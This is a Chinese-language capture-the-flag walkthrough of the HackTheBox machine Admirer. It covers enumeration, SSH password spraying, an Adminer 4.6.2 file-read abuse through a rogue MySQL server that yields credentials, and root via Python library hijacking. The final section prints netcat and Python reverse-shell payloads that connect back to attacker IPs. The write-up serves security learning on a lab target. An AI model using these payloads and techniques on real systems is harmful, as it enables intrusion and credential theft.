HTB-靶机-Admirer
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.187
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.187 -o ./Legacy-autorecon masscan -p1-65535 10.10.10.187 --rate=1000 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//') nmap -Pn -sV -sC -p$ports 10.10.10.187 sudo nmap -sS -sV -T4 -O -A -v 10.10.10.187 nmap自动探测工具 https://github.com/21y4d/nmapAutomator 爆破目录新工具 https://github.com/phra/rustbuster
发现开放了3个端口,开放的21端口根据显示的版本搜索了下没有找到对应的exploit,22端口也没有找到可以利用的exploit,那么只好看看80端口了,根据得到的信息,显示robots.txt
不允许访问/admin-dir
再根据靶机的官方提示需要枚举,那进行枚举目录的可能性很大,这里使用一个比较新的工具进行枚举目录
下载二进制文件 wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster 探测目录 ./rustbuster dir -u http://10.10.10.187/admin-dir/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt --threads 20 爆出出来了重要的目录 GET 200 OK http://10.10.10.187/admin-dir/contacts.txt GET 200 OK http://10.10.10.187/admin-dir/credentials.txt 使用wget将其下载下来
根据上面的信息提权用户名和密码进行密码爆破
使用cme进行ssh密码测试验证
https://github.com/byt3bl33d3r/CrackMapExec/releases
kali@kali:~/Downloads/htb/admirer$ ./cme ssh 10.10.10.187 -u usernames -p passwords
SSH 10.10.10.187 22 10.10.10.187 [*] SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] p.wise:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] r.nayyar:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] a.bialik:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] l.galecki:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] h.helberg:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] b.rauch:w0rdpr3ss01! Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:fgJr6q#S\W:$P Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:%n?4Wz}R$tTF7 Authentication failed.
SSH 10.10.10.187 22 10.10.10.187 [-] w.cooper:w0rdpr3ss01! Authentication failed.
爆破都没有成功,试试上面给出的ftp账号和密码
提取密码关键字信息 kali@kali:~/Downloads/htb/admirer/html$ grep -ir password utility-scripts/db_admin.php: $password = "Wh3r3_1s_w4ld0?"; utility-scripts/db_admin.php: $conn = new mysqli($servername, $username, $password); index.php: $password = "]F7jLHw:*G>UPrTo}~A"d6b"; index.php: $conn = new mysqli($servername, $username, $password, $dbname); 或者 grep -i -R "user\|pass" ./
然后再翻看下载下来的所有文件,找到了又找到了几个账号和密码,再丢进去试试ssh登录爆破,结果还是失败,回头再看看html目录和phpinfo信息,确认就是网站的根目录,在其中一个目录下发现数据配置连接信息,在此基础上进行枚举
翻看下载下来的文件,找到了可能存在目标靶机的文件及目录 kali@kali:~/Downloads/htb/admirer/html$ cd utility-scripts/ kali@kali:~/Downloads/htb/admirer/html/utility-scripts$ ls admin_tasks.php db_admin.php info.php phptest.php
再次在改目录下探测下是不是有别的目录 ./rustbuster dir -u http://10.10.10.187/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e php,txt --threads 20
最终发现一个管理mysql数据库的文件adminer.php,通过上面FTP账号下载下来发现的数据库账号和密码都不能成功登录到数据库
http://10.10.10.187/utility-scripts/adminer.php
显示当前版本是4.6.2 搜索此版本对应的exploit,发现确实有,可参考:
https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
根据上面文章的提示参考,需要本地kali搭建mariadb数据库然后使用目标靶机的adminer连接本地kali的数据库读取目标靶机正在连接的数据库账号和密码等敏感信息
具体操作细节如下:
开始本地kali安装mysql数据库,开始之前先看看本地缓存有哪些可以安装的数据库 sudo apt-cache search mysql-server sudo apt-cache search mysql-client 如果没有安装可以按照下面方式安装 sudo apt install mariadb-server-10.3 mariadb-client-10.3 启动数据库mariadb systemctl start mariadb 如果使用空密码登录不进去就可以在配置50-server.cnf 里面的[mysqld]下添加skip-grant-tables,保存然后重启数据库 systemctl restart mariadb.service 修改密码 use mysql select user,plugin from mysql.user; update mysql.user set authentication_string=password('cntf'), plugin = 'mysql_native_password' where user = 'root'; flush privileges; systemctl restart mariadb.service 操作数据库 CREATE DATABASE backup; USE backup; CREATE TABLE backup (name VARCHAR(2000)); CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'redhat'; GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187'; 使用下面方式远程登录kali搭建的数据库 10.10.14.2 backup redhat backup LOAD DATA LOCAL INFILE '/opt/scripts/admin_tasks.sh' INTO TABLE backup.backup FIELDS TERMINATED BY "\n" 执行失败,查看了phpinfo信息发现open_basedir是基于/var/www/html/ 那么使用相对路径试试看 LOAD DATA LOCAL INFILE '../index.php' INTO TABLE backup.backup FIELDS TERMINATED BY "\n" 选中backup数据库进去得到如下敏感信息 $servername = "localhost"; $username = "waldo"; $password = "&<h5b~yK3F#{PaPB&dA}{H>"; $dbname = "admirerdb";
创建数据库backup及用户名并赋予权限
远程登录kali上的数据库
成功登录之后选中数据库执行sql语句,得到如下结果
执行失败,查看了phpinfo信息发现open_basedir是基于/var/www/html/ 那么使用相对路径试试看 LOAD DATA LOCAL INFILE '../index.php' INTO TABLE backup.backup FIELDS TERMINATED BY "\n"
显示执行成功,然后就可以选中backup数据库进去得到如下敏感信息
$servername = "localhost"; $username = "waldo"; $password = "&<h5b~yK3F#{PaPB&dA}{H>"; $dbname = "admirerdb";
得到了账号和密码,试试登录ssh,测试了下成功登录
sshpass -p '&<h5b~yK3F#{PaPB&dA}{H>' ssh waldo@10.10.10.187
执行sudo -l
确认可以通过sudo使用上述方式进行提权,查看了/opt/scripts/admin_tasks.sh脚本 ,最终确认uid等于0的时候执行6进行备份web目录可以用python库文件以root身份操作,那么此处就可以提权root用户
#!/bin/bash view_uptime() { /usr/bin/uptime -p } view_users() { /usr/bin/w } view_crontab() { /usr/bin/crontab -l } backup_passwd() { if [ "$EUID" -eq 0 ] then echo "Backing up /etc/passwd to /var/backups/passwd.bak..." /bin/cp /etc/passwd /var/backups/passwd.bak /bin/chown root:root /var/backups/passwd.bak /bin/chmod 600 /var/backups/passwd.bak echo "Done." else echo "Insufficient privileges to perform the selected operation." fi } backup_shadow() { if [ "$EUID" -eq 0 ] then echo "Backing up /etc/shadow to /var/backups/shadow.bak..." /bin/cp /etc/shadow /var/backups/shadow.bak /bin/chown root:shadow /var/backups/shadow.bak /bin/chmod 600 /var/backups/shadow.bak echo "Done." else echo "Insufficient privileges to perform the selected operation." fi } backup_web() { if [ "$EUID" -eq 0 ] then echo "Running backup script in the background, it might take a while..." /opt/scripts/backup.py & else echo "Insufficient privileges to perform the selected operation." fi } backup_db() { if [ "$EUID" -eq 0 ] then echo "Running mysqldump in the background, it may take a while..." #/usr/bin/mysqldump -u root admirerdb > /srv/ftp/dump.sql & /usr/bin/mysqldump -u root admirerdb > /var/backups/dump.sql & else echo "Insufficient privileges to perform the selected operation." fi } # Non-interactive way, to be used by the web interface if [ $# -eq 1 ] then option=$1 case $option in 1) view_uptime ;; 2) view_users ;; 3) view_crontab ;; 4) backup_passwd ;; 5) backup_shadow ;; 6) backup_web ;; 7) backup_db ;; *) echo "Unknown option." >&2 esac exit 0 fi # Interactive way, to be called from the command line options=("View system uptime" "View logged in users" "View crontab" "Backup passwd file" "Backup shadow file" "Backup web data" "Backup DB" "Quit") echo echo "[[[ System Administration Menu ]]]" PS3="Choose an option: " COLUMNS=11 select opt in "${options[@]}"; do case $REPLY in 1) view_uptime ; break ;; 2) view_users ; break ;; 3) view_crontab ; break ;; 4) backup_passwd ; break ;; 5) backup_shadow ; break ;; 6) backup_web ; break ;; 7) backup_db ; break ;; 8) echo "Bye!" ; break ;; *) echo "Unknown option." >&2 esac done exit 0
读取执行的python脚本文件内容
waldo@admirer:/opt/scripts$ cat backup.py #!/usr/bin/python3 from shutil import make_archive src = '/var/www/html/' # old ftp directory, not used anymore #dst = '/srv/ftp/html' dst = '/var/backups/html' make_archive(dst, 'gztar', src)
根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权
相关python 库劫持可以参考:https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
提权的相关代码内容
import os def make_archive(h, t, b): os.system('nc 10.10.14.2 8833 -e "/bin/bash"') 或者 #!/usr/bin/python3 import os import pty import socket lhost = "10.10.14.2" lport = 8888 def make_archive(a,b,c): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost, lport)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() 或者 import socket import pty import os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.223",1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash")
触发提权 sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6
